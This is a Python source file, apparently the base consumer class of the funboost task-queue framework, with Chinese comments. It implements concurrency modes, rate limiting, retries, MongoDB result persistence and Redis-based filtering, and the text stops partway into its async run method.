# @Author : ydf
# @Time : 2019/8/8 0008 13:11
"""
所有中间件类型消费者的抽象基类。使实现不同中间件的消费者尽可能代码少。
整个流程最难的都在这里面。因为要实现多种并发模型,和对函数施加20运行种控制方式,所以代码非常长。
"""
import typing
import abc
import copy
from pathlib import Path
# from multiprocessing import Process
import datetime
# noinspection PyUnresolvedReferences,PyPackageRequirements
import pytz
import json
import logging
import sys
import atexit
import socket
import os
import uuid
import time
import traceback
from collections import Callable
from functools import wraps
import threading
from threading import Lock, Thread
import eventlet
import gevent
import asyncio
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.executors.pool import ThreadPoolExecutor as ApschedulerThreadPoolExecutor
from apscheduler.events import EVENT_JOB_MISSED
from funboost.concurrent_pool.single_thread_executor import SoloExecutor
from funboost.utils.apscheduler_monkey import patch_run_job as patch_apscheduler_run_job
import pymongo
from pymongo import IndexModel
from pymongo.errors import PyMongoError
# noinspection PyUnresolvedReferences
from nb_log import get_logger, LoggerLevelSetterMixin, LogManager, nb_print, LoggerMixin, \
LoggerMixinDefaultWithFileHandler, stdout_write, stderr_write, is_main_process, \
only_print_on_main_process, nb_log_config_default
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.async_helper import simple_run_in_executor
from funboost.concurrent_pool.async_pool_executor import AsyncPoolExecutor
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.bounded_threadpoolexcutor import \
BoundedThreadPoolExecutor
from funboost.concurrent_pool.custom_evenlet_pool_executor import evenlet_timeout_deco, \
check_evenlet_monkey_patch, CustomEventletPoolExecutor
from funboost.concurrent_pool.custom_gevent_pool_executor import gevent_timeout_deco, \
GeventPoolExecutor, check_gevent_monkey_patch
from funboost.concurrent_pool.custom_threadpool_executor import \
CustomThreadPoolExecutor, check_not_monkey
# from funboost.concurrent_pool.concurrent_pool_with_multi_process import ConcurrentPoolWithProcess
from funboost.consumers.redis_filter import RedisFilter, RedisImpermanencyFilter
from funboost.factories.publisher_factotry import get_publisher
from funboost.utils import decorators, time_util, RedisMixin
# noinspection PyUnresolvedReferences
from funboost.utils.bulk_operation import MongoBulkWriteHelper, InsertOne
from funboost.utils.mongo_util import MongoMixin
from funboost import funboost_config_deafult
# noinspection PyUnresolvedReferences
from funboost.constant import ConcurrentModeEnum, BrokerEnum
patch_apscheduler_run_job()
def _delete_keys_and_return_new_dict(dictx: dict, keys: list = None):
dict_new = copy.copy(dictx) # 主要是去掉一级键 publish_time,浅拷贝即可。
keys = ['publish_time', 'publish_time_format', 'extra'] if keys is None else keys
for dict_key in keys:
try:
dict_new.pop(dict_key)
except KeyError:
pass
return dict_new
class ExceptionForRetry(Exception):
"""为了重试的,抛出错误。只是定义了一个子类,用不用都可以,函数出任何类型错误了框架都会自动重试"""
class ExceptionForRequeue(Exception):
"""框架检测到此错误,重新放回队列中"""
def _get_publish_time(paramsx: dict):
"""
原来存放控制参数的位置没想好,建议所有控制参数放到extra键的字典值里面。
:param paramsx:
:return:
"""
return paramsx.get('extra', {}).get('publish_time', None) or paramsx.get('publish_time', None)
class FunctionResultStatus(LoggerMixin, LoggerLevelSetterMixin):
host_name = socket.gethostname()
host_process = f'{host_name} - {os.getpid()}'
script_name_long = sys.argv[0]
script_name = script_name_long.split('/')[-1].split('\\')[-1]
def __init__(self, queue_name, fucntion_name, params):
self.queue_name = queue_name
self.function = fucntion_name
publish_time = _get_publish_time(params)
if publish_time:
self.publish_time_str = time_util.DatetimeConverter(publish_time).datetime_str
function_params = _delete_keys_and_return_new_dict(params, )
self.params = function_params
self.params_str = json.dumps(function_params, ensure_ascii=False)
self.result = None
self.run_times = 0
self.exception = None
self.time_start = time.time()
self.time_cost = None
self.time_end = None
self.success = False
self.total_thread = threading.active_count()
self.has_requeue = False
self.set_log_level(20)
def get_status_dict(self, without_datetime_obj=False):
self.time_end = time.time()
self.time_cost = round(self.time_end - self.time_start, 3)
item = self.__dict__
item['host_name'] = self.host_name
item['host_process'] = self.host_process
item['script_name'] = self.script_name
item['script_name_long'] = self.script_name_long
# item.pop('time_start')
datetime_str = time_util.DatetimeConverter().datetime_str
try:
json.dumps(item['result']) # 不希望存不可json序列化的复杂类型。麻烦。存这种类型的结果是伪需求。
except TypeError:
item['result'] = str(item['result'])[:1000]
item.update({'insert_time_str': datetime_str,
'insert_minutes': datetime_str[:-3],
})
if not without_datetime_obj:
item.update({'insert_time': datetime.datetime.now(),
'utime': datetime.datetime.utcnow(),
})
else:
item = _delete_keys_and_return_new_dict(item, ['insert_time', 'utime'])
item['_id'] = str(uuid.uuid4())
# self.logger.warning(item['_id'])
# self.logger.warning(item)
return item
class FunctionResultStatusPersistanceConfig(LoggerMixin):
def __init__(self, is_save_status: bool, is_save_result: bool, expire_seconds: int = 7 * 24 * 3600, is_use_bulk_insert=True):
"""
:param is_save_status:
:param is_save_result:
:param expire_seconds: 设置统计的过期时间,在mongo里面自动会移除这些过期的执行记录。
:param is_use_bulk_insert : 是否使用批量插入来保存结果,批量插入是每隔0.5秒钟保存一次最近0.5秒内的所有的函数消费状态结果。为False则,每完成一次函数就实时写入一次到mongo。
"""
if not is_save_status and is_save_result:
raise ValueError(f'你设置的是不保存函数运行状态但保存函数运行结果。不允许你这么设置')
self.is_save_status = is_save_status
self.is_save_result = is_save_result
if expire_seconds > 10 * 24 * 3600:
self.logger.warning(f'你设置的过期时间为 {expire_seconds} ,设置的时间过长。 ')
self.expire_seconds = expire_seconds
self.is_use_bulk_insert = is_use_bulk_insert
def to_dict(self):
return {"is_save_status": self.is_save_status,
'is_save_result': self.is_save_result, 'expire_seconds': self.expire_seconds}
class ResultPersistenceHelper(MongoMixin, LoggerMixin):
def __init__(self, function_result_status_persistance_conf: FunctionResultStatusPersistanceConfig, queue_name):
self.function_result_status_persistance_conf = function_result_status_persistance_conf
self._bulk_list = []
self._bulk_list_lock = Lock()
self._last_bulk_insert_time = 0
if self.function_result_status_persistance_conf.is_save_status:
task_status_col = self.mongo_db_task_status.get_collection(queue_name)
try:
# params_str 如果很长,必须使用TEXt或HASHED索引。
task_status_col.create_indexes([IndexModel([("insert_time_str", -1)]), IndexModel([("insert_time", -1)]),
IndexModel([("params_str", pymongo.TEXT)]), IndexModel([("success", 1)])
], )
task_status_col.create_index([("utime", 1)],
expireAfterSeconds=function_result_status_persistance_conf.expire_seconds) # 只保留7天(用户自定义的)。
except pymongo.errors.OperationFailure as e: # 新的mongo服务端,每次启动重复创建已存在索引会报错,try一下。
self.logger.warning(e)
# self._mongo_bulk_write_helper = MongoBulkWriteHelper(task_status_col, 100, 2)
self.task_status_col = task_status_col
self.logger.info(f"函数运行状态结果将保存至mongo的 task_status 库的 {queue_name} 集合中,请确认 funboost.py文件中配置的 MONGO_CONNECT_URL")
def save_function_result_to_mongo(self, function_result_status: FunctionResultStatus):
if self.function_result_status_persistance_conf.is_save_status:
item = function_result_status.get_status_dict()
item2 = copy.copy(item)
if not self.function_result_status_persistance_conf.is_save_result:
item2['result'] = '不保存结果'
if item2['result'] is None:
item2['result'] = ''
if item2['exception'] is None:
item2['exception'] = ''
if self.function_result_status_persistance_conf.is_use_bulk_insert:
# self._mongo_bulk_write_helper.add_task(InsertOne(item2)) # 自动离散批量聚合方式。
with self._bulk_list_lock:
self._bulk_list.append(InsertOne(item2))
if time.time() - self._last_bulk_insert_time > 0.5:
self.task_status_col.bulk_write(self._bulk_list, ordered=False)
self._bulk_list.clear()
self._last_bulk_insert_time = time.time()
else:
self.task_status_col.insert_one(item2) # 立即实时插入。
class ConsumersManager:
schedulal_thread_to_be_join = []
consumers_queue__info_map = dict()
global_concurrent_mode = None
schedual_task_always_use_thread = False
_has_show_conusmers_info = False
@classmethod
def join_all_consumer_shedual_task_thread(cls):
'''实现这个主要是为了兼容linux和win,在开启多进程时候兼容。在linux下如果子进程中即使有在一个非守护线程里面运行while 1的逻辑,代码也会很快结束。所以必须把所有循环拉取消息的线程join
否则如果只是为了兼容win,压根不需要这里多此一举
'''
# nb_print((cls.schedulal_thread_to_be_join, len(cls.schedulal_thread_to_be_join), '模式:', cls.global_concurrent_mode))
if cls.schedual_task_always_use_thread:
for t in cls.schedulal_thread_to_be_join:
nb_print(t)
t.join()
else:
if cls.global_concurrent_mode in [1, 4]:
for t in cls.schedulal_thread_to_be_join:
# nb_print(t)
t.join()
elif cls.global_concurrent_mode == 2:
# cls.logger.info()
# nb_print(cls.schedulal_thread_to_be_join)
gevent.joinall(cls.schedulal_thread_to_be_join, raise_error=True, )
elif cls.global_concurrent_mode == 3:
for g in cls.schedulal_thread_to_be_join:
# eventlet.greenthread.GreenThread.
# nb_print(g)
g.wait()
@classmethod
def show_all_consumer_info(cls):
# nb_print(f'当前解释器内,所有消费者的信息是:\n {cls.consumers_queue__info_map}')
# if only_print_on_main_process(f'当前解释器内,所有消费者的信息是:\n {json.dumps(cls.consumers_queue__info_map, indent=4, ensure_ascii=False)}'):
if not cls._has_show_conusmers_info:
for _, consumer_info in cls.consumers_queue__info_map.items():
stdout_write(f'{time.strftime("%H:%M:%S")} "{consumer_info["where_to_instantiate"]}" '
f' \033[0;30;44m{consumer_info["queue_name"]} 的消费者\033[0m\n')
cls._has_show_conusmers_info = True
@staticmethod
def get_concurrent_name_by_concurrent_mode(concurrent_mode):
if concurrent_mode == 1:
return 'thread'
elif concurrent_mode == 2:
return 'gevent'
elif concurrent_mode == 3:
return 'evenlet'
elif concurrent_mode == 4:
return 'async'
elif concurrent_mode == 5:
return 'single_thread'
# noinspection DuplicatedCode
class AbstractConsumer(LoggerLevelSetterMixin, metaclass=abc.ABCMeta, ):
time_interval_for_check_do_not_run_time = 60
BROKER_KIND = None
@property
@decorators.synchronized
def publisher_of_same_queue(self):
if not self._publisher_of_same_queue:
self._publisher_of_same_queue = get_publisher(self._queue_name, consuming_function=self.consuming_function,
broker_kind=self.BROKER_KIND, log_level_int=self._log_level,
is_add_file_handler=self._create_logger_file)
if self._msg_expire_senconds:
self._publisher_of_same_queue.set_is_add_publish_time()
return self._publisher_of_same_queue
def bulid_a_new_publisher_of_same_queue(self):
return get_publisher(self._queue_name, broker_kind=self.BROKER_KIND)
@classmethod
def join_shedual_task_thread(cls):
"""
:return:
"""
ConsumersManager.join_all_consumer_shedual_task_thread()
# noinspection PyProtectedMember,PyUnresolvedReferences
def __init__(self, queue_name, *, consuming_function: Callable = None, function_timeout=0, concurrent_num=50,
specify_concurrent_pool=None, specify_async_loop=None, concurrent_mode=ConcurrentModeEnum.THREADING,
max_retry_times=3, log_level=10, is_print_detail_exception=True, is_show_message_get_from_broker=False,
qps: float = 0, is_using_distributed_frequency_control=False,
msg_expire_senconds=0, is_send_consumer_hearbeat_to_redis=False,
logger_prefix='', create_logger_file=True, do_task_filtering=False,
task_filtering_expire_seconds=0,
is_do_not_run_by_specify_time_effect=False,
do_not_run_by_specify_time=('10:00:00', '22:00:00'),
schedule_tasks_on_main_thread=False,
function_result_status_persistance_conf=FunctionResultStatusPersistanceConfig(
False, False, 7 * 24 * 3600),
is_using_rpc_mode=False):
"""
:param queue_name:
:param consuming_function: 处理消息的函数。
:param function_timeout : 超时秒数,函数运行超过这个时间,则自动杀死函数。为0是不限制。
# 如果设置了qps,并且cocurrent_num是默认的50,会自动开了500并发,由于是采用的智能线程池任务少时候不会真开那么多线程而且会自动缩小线程数量。具体看ThreadPoolExecutorShrinkAble的说明
# 由于有很好用的qps控制运行频率和智能扩大缩小的线程池,此框架建议不需要理会和设置并发数量只需要关心qps就行了,框架的并发是自适应并发数量,这一点很强很好用。
:param concurrent_num:并发数量,并发种类由concurrent_mode决定
:param specify_concurrent_pool:使用指定的线程池/携程池,可以多个消费者共使用一个线程池,不为None时候。threads_num失效
:param specify_async_loop:指定的async的loop循环,设置并发模式为async才能起作用。
:param concurrent_mode:并发模式,1线程(ConcurrentModeEnum.THREADING) 2gevent(ConcurrentModeEnum.GEVENT)
3eventlet(ConcurrentModeEnum.EVENTLET) 4 asyncio(ConcurrentModeEnum.ASYNC) 5单线程(ConcurrentModeEnum.SINGLE_THREAD)
:param max_retry_times:
:param log_level: # 这里是设置消费者 发布者日志级别的,如果不想看到很多的细节显示信息,可以设置为 20 (logging.INFO)。
:param is_print_detail_exception:函数出错时候时候显示详细的错误堆栈,占用屏幕太多
:param is_show_message_get_from_broker: 从中间件取出消息时候时候打印显示出来
:param qps:指定1秒内的函数执行次数,例如可以是小数0.01代表每100秒执行一次,也可以是50代表1秒执行50次.为0则不控频。
:param is_using_distributed_frequency_control: 是否使用分布式空频(依赖redis统计消费者数量,然后频率平分),默认只对当前实例化的消费者空频有效。
假如实例化了2个qps为10的使用同一队列名的消费者,并且都启动,则每秒运行次数会达到20。如果使用分布式空频则所有消费者加起来的总运行次数是10。
:param is_send_consumer_hearbeat_to_redis 时候将发布者的心跳发送到redis,有些功能的实现需要统计活跃消费者。因为有的中间件不是真mq。
:param logger_prefix: 日志前缀,可使不同的消费者生成不同的日志
:param create_logger_file : 是否创建文件日志
:param do_task_filtering :是否执行基于函数参数的任务过滤
:param task_filtering_expire_seconds:任务过滤的失效期,为0则永久性过滤任务。例如设置过滤过期时间是1800秒 ,
30分钟前发布过1 + 2 的任务,现在仍然执行,
如果是30分钟以内发布过这个任务,则不执行1 + 2,现在把这个逻辑集成到框架,一般用于接口价格缓存。
:param is_do_not_run_by_specify_time_effect :是否使不运行的时间段生效
:param do_not_run_by_specify_time :不运行的时间段
:param schedule_tasks_on_main_thread :直接在主线程调度任务,意味着不能直接在当前主线程同时开启两个消费者。
:param function_result_status_persistance_conf :配置。是否保存函数的入参,运行结果和运行状态到mongodb。
这一步用于后续的参数追溯,任务统计和web展示,需要安装mongo。
:param is_using_rpc_mode 是否使用rpc模式,可以在发布端获取消费端的结果回调,但消耗一定性能,使用async_result.result时候会等待阻塞住当前线程。
执行流程为
1、 实例化消费者类,设置各种控制属性
2、启动 start_consuming_message 启动消费
3、start_consuming_message 中 调用 _shedual_task 从中间件循环取消息
4、 _shedual_task 中调用 _submit_task,将 任务 添加到并发池中并发运行。
5、 函数执行完成后,运行 _confirm_consume , 确认消费。
各种中间件的 取消息、确认消费 单独实现,其他逻辑由于采用了模板模式,自动复用代码。
"""
self.init_params = copy.copy(locals())
self.init_params.pop('self')
self.init_params['broker_kind'] = self.__class__.BROKER_KIND
self.init_params['consuming_function'] = consuming_function
ConsumersManager.consumers_queue__info_map[queue_name] = current_queue__info_dict = copy.copy(self.init_params)
current_queue__info_dict['consuming_function'] = str(consuming_function) # consuming_function.__name__
current_queue__info_dict['specify_async_loop'] = str(specify_async_loop)
current_queue__info_dict[
'function_result_status_persistance_conf'] = function_result_status_persistance_conf.to_dict()
current_queue__info_dict['class_name'] = self.__class__.__name__
concurrent_name = ConsumersManager.get_concurrent_name_by_concurrent_mode(concurrent_mode)
current_queue__info_dict['concurrent_mode_name'] = concurrent_name
# 方便点击跳转定位到当前解释器下所有实例化消费者的文件行,点击可跳转到该处。
# 获取被调用函数在被调用时所处代码行数
# 直接实例化相应的类和使用工厂模式来实例化相应的类,得到的消费者实际实例化的行是不一样的,希望定位到用户的代码处,而不是定位到工厂模式处。也不要是boost装饰器本身处。
line = sys._getframe(0).f_back.f_lineno
# 获取被调用函数所在模块文件名
file_name = sys._getframe(1).f_code.co_filename
if 'consumer_factory.py' in file_name:
line = sys._getframe(1).f_back.f_lineno
file_name = sys._getframe(2).f_code.co_filename
if r'funboost\__init__.py' in file_name or 'funboost/__init__.py' in file_name:
line = sys._getframe(2).f_back.f_lineno
file_name = sys._getframe(3).f_code.co_filename
if r'funboost\helpers.py' in file_name or 'funboost/helpers.py' in file_name:
line = sys._getframe(3).f_back.f_lineno
file_name = sys._getframe(4).f_code.co_filename
current_queue__info_dict['where_to_instantiate'] = f'{file_name}:{line}'
self._queue_name = queue_name
self.queue_name = queue_name # 可以换成公有的,免得外部访问有警告。
if consuming_function is None:
raise ValueError('必须传 consuming_function 参数')
self.consuming_function = consuming_function
self._function_timeout = function_timeout
# 如果设置了qps,并且cocurrent_num是默认的50,会自动开了500并发,由于是采用的智能线程池任务少时候不会真开那么多线程而且会自动缩小线程数量。具体看ThreadPoolExecutorShrinkAble的说明
# 由于有很好用的qps控制运行频率和智能扩大缩小的线程池,此框架建议不需要理会和设置并发数量只需要关心qps就行了,框架的并发是自适应并发数量,这一点很强很好用。
if qps != 0 and concurrent_num == 50:
self._concurrent_num = 500
else:
self._concurrent_num = concurrent_num
self._specify_concurrent_pool = specify_concurrent_pool
self._specify_async_loop = specify_async_loop
self._concurrent_pool = None
self._concurrent_mode = concurrent_mode
self._max_retry_times = max_retry_times
self._is_print_detail_exception = is_print_detail_exception
self._is_show_message_get_from_broker = is_show_message_get_from_broker
self._qps = qps
self._msg_schedule_time_intercal = 0 if qps == 0 else 1.0 / qps
self._is_using_distributed_frequency_control = is_using_distributed_frequency_control
self._is_send_consumer_hearbeat_to_redis = is_send_consumer_hearbeat_to_redis or is_using_distributed_frequency_control
self._msg_expire_senconds = msg_expire_senconds
if self._concurrent_mode not in (1, 2, 3, 4, 5):
raise ValueError('设置的并发模式不正确')
self._concurrent_mode_dispatcher = ConcurrentModeDispatcher(self)
if self._concurrent_mode == 4:
self._run = self._async_run # 这里做了自动转化,使用async_run代替run
self._logger_prefix = logger_prefix
self._log_level = log_level
if logger_prefix != '':
logger_prefix += '--'
# logger_name = f'{logger_prefix}{self.__class__.__name__}--{concurrent_name}--{queue_name}--{self.consuming_function.__name__}'
logger_name = f'{logger_prefix}{self.__class__.__name__}--{queue_name}'
# nb_print(logger_name)
self._create_logger_file = create_logger_file
self._log_level = log_level
log_file_handler_type = 1
if int(os.getenv('is_fsdf_remote_run', 0)) == 1: # 这个是远程部署的自动的环境变量,用户不需要亲自自己设置这个值。
log_file_handler_type = 5 # 如果是fabric_deploy 自动化远程部署函数时候,python -c 启动的使用第一个filehandler没记录文件,现在使用第5种filehandler。
self.logger = get_logger(logger_name, log_level_int=log_level, log_filename=f'{logger_name}.log' if create_logger_file else None,
log_file_handler_type=log_file_handler_type,
formatter_template=funboost_config_deafult.NB_LOG_FORMATER_INDEX_FOR_CONSUMER_AND_PUBLISHER, )
# self.logger.info(f'{self.__class__} 在 {current_queue__info_dict["where_to_instantiate"]} 被实例化')
stdout_write(f'{time.strftime("%H:%M:%S")} "{current_queue__info_dict["where_to_instantiate"]}" \033[0;30;44m此行 '
f'实例化队列名 {current_queue__info_dict["queue_name"]} 的消费者, 类型为 {self.__class__}\033[0m\n')
self._do_task_filtering = do_task_filtering
self._redis_filter_key_name = f'filter_zset:{queue_name}' if task_filtering_expire_seconds else f'filter_set:{queue_name}'
filter_class = RedisFilter if task_filtering_expire_seconds == 0 else RedisImpermanencyFilter
self._redis_filter = filter_class(self._redis_filter_key_name, task_filtering_expire_seconds)
self._unit_time_for_count = 10 # 每隔多少秒计数,显示单位时间内执行多少次,暂时固定为10秒。
self._execute_task_times_every_unit_time = 0 # 每单位时间执行了多少次任务。
self._lock_for_count_execute_task_times_every_unit_time = Lock()
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._last_execute_task_time = time.time() # 最近一次执行任务的时间。
self._msg_num_in_broker = 0
self._last_timestamp_when_has_task_in_queue = 0
self._last_timestamp_print_msg_num = 0
self._is_do_not_run_by_specify_time_effect = is_do_not_run_by_specify_time_effect
self._do_not_run_by_specify_time = do_not_run_by_specify_time # 可以设置在指定的时间段不运行。
self._schedule_tasks_on_main_thread = schedule_tasks_on_main_thread
self._result_persistence_helper = ResultPersistenceHelper(function_result_status_persistance_conf, queue_name)
self._is_using_rpc_mode = is_using_rpc_mode
self.stop_flag = False
# 控频要用到的成员变量
self._last_submit_task_timestamp = 0
self._last_start_count_qps_timestamp = time.time()
self._has_execute_times_in_recent_second = 0
self._publisher_of_same_queue = None
self.consumer_identification = f'{nb_log_config_default.computer_name}_{nb_log_config_default.computer_ip}_' \
f'{time_util.DatetimeConverter().datetime_str.replace(":", "-")}_{os.getpid()}_{id(self)}'
self.consumer_identification_map = {'queue_name': self.queue_name,
'computer_name': nb_log_config_default.computer_name,
'computer_ip': nb_log_config_default.computer_ip,
'process_id': os.getpid(),
'consumer_id': id(self),
'consumer_uuid': str(uuid.uuid4()),
'start_datetime_str': time_util.DatetimeConverter().datetime_str,
'start_timestamp': time.time(),
'hearbeat_datetime_str': time_util.DatetimeConverter().datetime_str,
'hearbeat_timestamp': time.time(),
'consuming_function': self.consuming_function.__name__,
'code_filename': Path(self.consuming_function.__code__.co_filename).as_posix()
}
self._delay_task_scheduler = BackgroundScheduler(timezone=funboost_config_deafult.TIMEZONE)
self._delay_task_scheduler.add_executor(ApschedulerThreadPoolExecutor(2)) # 只是运行submit任务到并发池,不需要很多线程。
self._delay_task_scheduler.add_listener(self.__apscheduler_job_miss, EVENT_JOB_MISSED)
self._delay_task_scheduler.start()
self.custom_init()
atexit.register(self.join_shedual_task_thread)
def __check_monkey_patch(self):
if self._concurrent_mode == 2:
check_gevent_monkey_patch()
elif self._concurrent_mode == 3:
check_evenlet_monkey_patch()
else:
check_not_monkey()
@property
@decorators.synchronized
def concurrent_pool(self):
return self._concurrent_mode_dispatcher.build_pool()
def custom_init(self):
pass
def keep_circulating(self, time_sleep=0.001, exit_if_function_run_sucsess=False, is_display_detail_exception=True,
block=True):
"""间隔一段时间,一直循环运行某个方法的装饰器
:param time_sleep :循环的间隔时间
:param is_display_detail_exception
:param exit_if_function_run_sucsess :如果成功了就退出循环
:param block:是否阻塞在当前主线程运行。
"""
def _keep_circulating(func):
@wraps(func)
def __keep_circulating(*args, **kwargs):
# noinspection PyBroadException
def ___keep_circulating():
while 1:
try:
result = func(*args, **kwargs)
if exit_if_function_run_sucsess:
return result
except Exception as e:
msg = func.__name__ + ' 运行出错\n ' + traceback.format_exc(
limit=10) if is_display_detail_exception else str(e)
self.logger.exception(msg)
finally:
time.sleep(time_sleep)
if block:
return ___keep_circulating()
else:
threading.Thread(target=___keep_circulating, ).start()
return __keep_circulating
return _keep_circulating
# noinspection PyAttributeOutsideInit
def start_consuming_message(self):
ConsumersManager.show_all_consumer_info()
# noinspection PyBroadException
try:
self._concurrent_mode_dispatcher.check_all_concurrent_mode()
self.__check_monkey_patch()
except Exception:
traceback.print_exc()
os._exit(4444) # noqa
self.logger.warning(f'开始消费 {self._queue_name} 中的消息')
if self._is_send_consumer_hearbeat_to_redis:
self._distributed_consumer_statistics = DistributedConsumerStatistics(self._queue_name, self.consumer_identification, self.consumer_identification_map)
self._distributed_consumer_statistics.run()
self.logger.warning(f'启动了分布式环境 使用 redis 的键 hearbeat:{self._queue_name} 统计活跃消费者 ,当前消费者唯一标识为 {self.consumer_identification}')
self.keep_circulating(10, block=False)(self.check_heartbeat_and_message_count)() # 间隔时间最好比self._unit_time_for_count小整数倍,不然日志不准。
if self._do_task_filtering:
self._redis_filter.delete_expire_filter_task_cycle() # 这个默认是RedisFilter类,是个pass不运行。所以用别的消息中间件模式,不需要安装和配置redis。
if self._schedule_tasks_on_main_thread:
self.keep_circulating(1)(self._shedual_task)()
else:
self._concurrent_mode_dispatcher.schedulal_task_with_no_block()
setattr(funboost_config_deafult, 'has_start_a_consumer_flag', 1)
@abc.abstractmethod
def _shedual_task(self):
"""
每个子类必须实现这个的方法,完成如何从中间件取出消息,并将函数和运行参数添加到工作池。
:return:
"""
raise NotImplementedError
def _print_message_get_from_broker(self, broker_name, msg):
if isinstance(msg, (dict, list)):
msg = json.dumps(msg, ensure_ascii=False)
# print(999)
if self._is_show_message_get_from_broker:
self.logger.debug(f'从 {broker_name} 中间件 的 {self._queue_name} 中取出的消息是 {msg}')
def __get_priority_conf(self, kw: dict, broker_task_config_key: str):
broker_task_config = kw['body'].get('extra', {}).get(broker_task_config_key, None)
if broker_task_config is None:
return getattr(self, f'_{broker_task_config_key}', None)
else:
return broker_task_config
# noinspection PyMethodMayBeStatic
def _get_concurrent_info(self):
concurrent_info = ''
''' 影响了日志长度和一丝丝性能。
if self._concurrent_mode == 1:
concurrent_info = f'[{threading.current_thread()} {threading.active_count()}]'
elif self._concurrent_mode == 2:
concurrent_info = f'[{gevent.getcurrent()} {threading.active_count()}]'
elif self._concurrent_mode == 3:
# noinspection PyArgumentList
concurrent_info = f'[{eventlet.getcurrent()} {threading.active_count()}]'
'''
return concurrent_info
def _run(self, kw: dict, ):
t_start_run_fun = time.time()
max_retry_times = self.__get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'])
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = self._run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body']),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
self._result_persistence_helper.save_function_result_to_mongo(current_function_result_status)
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self.__get_priority_conf(kw, "max_retry_times")} 后,仍然失败, 入参是 {function_only_params} ')
self._confirm_consume(kw) # 错得超过指定的次数了,就确认消费了。
if self.__get_priority_conf(kw, 'do_task_filtering'):
self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
if self.__get_priority_conf(kw, 'is_using_rpc_mode'):
# print(function_result_status.get_status_dict(without_datetime_obj=
with RedisMixin().redis_db_frame.pipeline() as p:
# RedisMixin().redis_db_frame.lpush(kw['body']['extra']['task_id'], json.dumps(function_result_status.get_status_dict(without_datetime_obj=True)))
# RedisMixin().redis_db_frame.expire(kw['body']['extra']['task_id'], 600)
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
with self._lock_for_count_execute_task_times_every_unit_time:
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
msg = f'{self._unit_time_for_count} 秒内执行了 {self._execute_task_times_every_unit_time} 次函数 [ {self.consuming_function.__name__} ] ,' \
f'函数平均运行耗时 {avarage_function_spend_time} 秒'
if self._msg_num_in_broker != -1:
if hasattr(self, '_distributed_consumer_statistics'):
active_consumer_num = self._distributed_consumer_statistics.active_consumer_num
else:
active_consumer_num = 1
# msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) / active_consumer_num)}''' + \
f''' 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
def _run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
t_start = time.time()
function_result_status.run_times = current_retry_times + 1
try:
function_timeout = self.__get_priority_conf(kw, 'function_timeout')
function_run = self.consuming_function if not function_timeout else self._concurrent_mode_dispatcher.timeout_deco(
function_timeout)(self.consuming_function)
function_result_status.result = function_run(**function_only_params)
if asyncio.iscoroutine(function_result_status.result):
self.logger.critical(f'异步的协程消费函数必须使用 async 并发模式并发,请设置 '
f'消费函数 {self.consuming_function.__name__} 的concurrent_mode 为 ConcurrentModeEnum.ASYNC 或 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(4)
function_result_status.success = True
self._confirm_consume(kw)
if self.__get_priority_conf(kw, 'do_task_filtering'):
self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
if self._log_level <= logging.DEBUG:
result_str_to_be_print = str(function_result_status.result)[:100] if len(str(function_result_status.result)) < 100 else str(function_result_status.result)[:100] + ' 。。。。。 '
self.logger.debug(f' 函数 {self.consuming_function.__name__} '
f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,入参是 {function_only_params} '
f' 结果是 {result_str_to_be_print} , {self._get_concurrent_info()} ')
except Exception as e:
if isinstance(e, (PyMongoError,
ExceptionForRequeue)): # mongo经常维护备份时候插入不了或挂了,或者自己主动抛出一个ExceptionForRequeue类型的错误会重新入队,不受指定重试次数逇约束。
self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)} {e},消息重新入队')
time.sleep(1) # 防止快速无限出错入队出队,导致cpu和中间件忙
self._requeue(kw)
function_result_status.has_requeue = True
return function_result_status
self.logger.error(f'函数 {self.consuming_function.__name__} 第{current_retry_times + 1}次运行发生错误,'
f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n 入参是 {function_only_params} \n 原因是 {type(e)} {e} ',
exc_info=self.__get_priority_conf(kw, 'is_print_detail_exception'))
# traceback.print_exc()
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
async def _async_run(self, kw: dict, ):
# """虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
